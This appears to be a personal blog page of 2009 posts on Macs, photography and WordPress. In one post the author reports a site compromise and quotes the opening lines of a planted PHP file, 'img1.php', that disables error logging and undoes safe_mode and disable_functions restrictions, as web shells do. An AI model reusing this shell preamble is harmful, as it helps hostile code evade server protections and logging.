Splash of Style...Macs, Photography, Design, and other Passions

I Was Hacked!

October 2, 2009 by debbie T | WordPress

Eeek! First off, let me say Thank God that I had the Wordpress plugin “WordPress File Monitor” installed, because that is what alerted me to the problem. Note to Bart B if you are reading this, heehe, I am glad I wasted my time with that voodoo! ;)

So, I get an email today from the Wordpress File Monitor (dated yesterday, I am slow) informing me that a bunch of files were uploaded to one of my other blogs in the “uploads” directory – left as 777 permissions for easy photo uploading.

In the uploads directory, a file named “img1.php” was added, along with a fresh new directory named “2008″ with a bunch of sitemap files. (note: I just started this blog in July of 2009, and I have no entries or uploads from 2008, so it was very fishy.)

So, of course my first thought is am I going crazy? Did I somehow upload these files without knowing? Initially at first I didn’t notice the .php file, so I only thought the 2008 sitemap files were added.

I contacted my host, and she assured me that it wasn’t anything too terrible, that it was an every day run of the mill spammer. Sneaky spammers! She has seen this sort of thing many times.

She suggested I change my Wordpress password and check the database for any extra users. I found no other user accounts, thankfully!

For future reference, I found two articles that list details on how to find and remove any hidden admin users:

http://blog.nachotech.com/?p=125
http://www.studionashvegas.com/wordpress/latest-wordpress-hack-check-your-permalinks-people/

But now I am left puzzled on how they got in!

My Wordpress admin password was pretty strong – 15 characters (numerical, upper and lower case letters) and I wasn’t using the default “admin” as my user name either. My host also suggested it might have been from “an exploit via a plugin that isn’t secured against arbitrary remote inclusion/retrieval”

I am only running 4 plug-ins. Akismet, Hello Dolly, WP Security Scan, and WordPress File Monitor. I did also have the un-updated WordPress Exploit Scanner plug-in, but it was left de-activated. I have since removed it from the plugins folder.

I suppose since I don’t have a secure login, I imagine that possibly my password could have been bypassed? I dunno. I think I might install the Login Lockdown plugin – yeah, Bart more voodoo!

Well, anyway, I am going to really search through my files and make sure everything else is alright.

I found an article that might help me search through the database just in case the spammers attached anything to my posts.

Right now, it doesn’t look like much damage was done. But worse case scenario, I have database backups every night. I can always revert back to one of the older ones and re-create the newer entries I wrote, or I could even export my entries and install a fresh copy of wordpress. We’ll see.

So, be wary of your Wordpress blogs! I dunno how they got into mine, but they did, and thankfully I was lucky and it wasn’t too painful!

PS. I took a look at the .php file they added, and one of the first lines of code was $language=’ru’ (aah, From Russia with love!) But anyway, here is the some of the code from the file:

error_reporting(0);
$language='ru';
$auth = 0;
$name='abcdef1234567890abcdef1234567890';
$pass='abcdef1234567890abcdef1234567890';
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");
@ini_set('error_log',NULL);
@ini_set('log_errors',0);

Mac Apps and Compatibility with Snow Leopard

October 2, 2009 by debbie T | Mac CornerMac Snow LeopardMac Software

I have Mac OS X Snow Leopard on order from Amazon. It will be here any day. In the meantime, I am getting organized and ready for the big re-install.

I have a plan to go the “upgrade” route first, to find out how much space I would save by upgrading.

Then the plan is to wipe the drive and install fresh.

Anyway, I want to make sure I get all my Mac apps in order with serial numbers, etc. I also want to make sure I download the most current version to ensure compatibility with Snow Leopard.

I found this great wiki site with lots of great info about Mac apps and their compatibility to Snow Leopard
http://snowleopard.wikidot.com/start

Amazon Call Me!

September 16, 2009 by debbie T | Internet

I was having a little problem with my Amazon purchase this morning, and I wanted to contact them about it. I clicked the “contact us” link at the bottom of the page.

contact us - amazon

A new windows opens, and your account name & password can be entered. (not required)

I figured I would just email them, since it wasn’t a big problem. But when I saw the contact options I was intrigued.

amazon-phone2

I clicked on the “Phone” tab and found a feature that calls you instead of you calling them! I had to try it! (I am pretty sure this feature isn’t necessarily new, but it’s been a long time since I had any issues with Amazon, so I am behind the times!)

After typing in my account password again, it opens another new window where you need to type your phone number. The default is to call you right away, but there is an option to choose a 5, 10, or 15 minute delay.

amazon-phone3

Once you submit your phone number info, your phone will ring immediately! Pick it up, and an automated voice tells you to hang on, etc…I figured it might be a bit of a wait, but nope! I was talking to Jennifer within a minute and she helped me with my problem. I don’t think I was on the phone for longer than 5 minutes from start to finish.

Why would you want to use this feature instead of just calling them yourself? Well, probably because your account info is immediately known by the customer service associate and it saves a lot of time! Plus it’s soo freakin’ cool!

AppleStore Robbed

September 3, 2009 by debbie T | Mac CornerRamblings

No, it isn’t funny that an Applestore was robbed, but the guy doing the voice over on the survellence tape sure is a riot. Who talks like that anymore?

“Leaving only the price tags behind!!!!” LOL. What a pompous jerk! I hate newscasters that sound like that!

http://abclocal.go.com/wpvi/video?id=6996090

(Note: I tried to embed the video, but for some reason, the code won’t work, so a link will have to do. Sorry)

Changing Admin User Name for Better Security in Wordpress

August 31, 2009 by debbie T | WordPress

It’s been advised to change the default “admin” user name on Wordpress installs, and it sounded like a great idea, until I tried to do it.

I found instructions, but details on how to actually edit the mySQL table were not explained. I tried to figure it out, but it just seemed too complicated.

The instructions over at guvnr.com were very helpful, but I didn’t want to start a new admin username, and delete the default user name, when I had so many older posts.

Well, I figured it out. Wordpress allows you to move your posts, pages, etc to a different user! Yay!

Add a new user with Admin privileges.
Go to Edit Posts and select all posts on the first page
Choose “Edit” from the Bulk Edit pull down menu and hit the Apply button
In the Bulk Edit editing area, choose your new user account from the Author pull down menu.
And lastly, hit the “Apply” button.

Go through each page of posts and repeat.

Awesome! I love Wordpress!

ETA: hahaa, okay, I admit I am a big dope. I went through the above steps on one of my Wordpress. After all posts were moved to the new user, it was time for me to delete my original admin user account.

I guess when you delete a user, Wordpress asks you if you want to attribute all posts to a new user, and gives you the opportunity to do so.

Oh well, I guess you all can ignore this post! haha!

One last note: Just make sure before you delete that you are logged out of the original admin account and logged in to the new one. And for safety, BACK UP your database first!!! Just in case!

Wordpress Security

August 31, 2009 by debbie T | WordPress

Slowly, I am working through all my Wordpress blogs and trying to make them more secure. I have found several web site articles and Wordpress plugins that have been very helpful.

New blog article from Matt – UPGRADING is the only way to keep yourself safe!

Good Mornin’

July 31, 2009 by debbie T | Digital Photography

Happy Friday!

Good morning bug on a wet leaf

Don’t Be Afraid to Think Big!

July 12, 2009 by debbie T | Digital Photography

We found this teenie tiny little guy this morning. Isn’t he adorable?

teenie tiny frog toad creature

Flight to Heaven

July 8, 2009 by debbie T | Digital Photography

Taken on our July 4th Holiday weekend. We were eating lunch by a little airport near Lake Winnipesaukee.

flying a plane to heaven

Importing Plain Text Into Excel Spreadsheet

July 5, 2009 by debbie T | Content ManagementMac SoftwareWindows on the Mac

I needed to convert a text document with personal data to an Excel spreadsheet. I wanted to use Neo Office (Open Office) but couldn’t find a way to import text, so I fired up my Windows XP virtual machine, and installed an old copy of Office 2000.

So, here’s the dilemma, the data was pasted into a text file from a web page and it was formatted with line breaks. There were 180 blocks of data like this:

first last
title
address
phone
email

first last
title
address
phone
email

After googling, I found that it’s fairly easy to import text as long as there is some sort of delimiter like tab, comma, semi-colon separating the data.

In excel, choose Data>Get External Data>Import Text File

import text file into excel

Initially, I tried comma, but didn’t work well, since some of the text data already had commas, so I decided to use a semi-colon delimiter.

I typed a semi-colon after each section & painstakenly removed each line break.

first ;last;title;address;phone;email
first ;last;title;address;phone;email
first ;last;title;address;phone;email

I worked in small chunks, importing after a few sections. This was taking forever. I needed a short cut!

Since I was using Text Wrangler, I figured there might be a way to automatically remove the line breaks. Yay! Found it. Text>Remove Line Breaks. Couldn’t be easier!

excel-import-breaks

Okay, now if only there was a way to somehow add a semi-colon after each line. Whoo-hooo, how about this:

Text>Prefix/Suffix Lines

I selected each section, added the suffix of “;” then removed the line breaks.

Text Wrangler cut my work in half!

NOTE: When Text Wrangler removed the line breaks, it added a space in between the items, so that messed up my spreadsheet by adding a space before each item in the cell. Before I imported, I did a “find/replace” and replaced all the ;(space) with ; and that worked!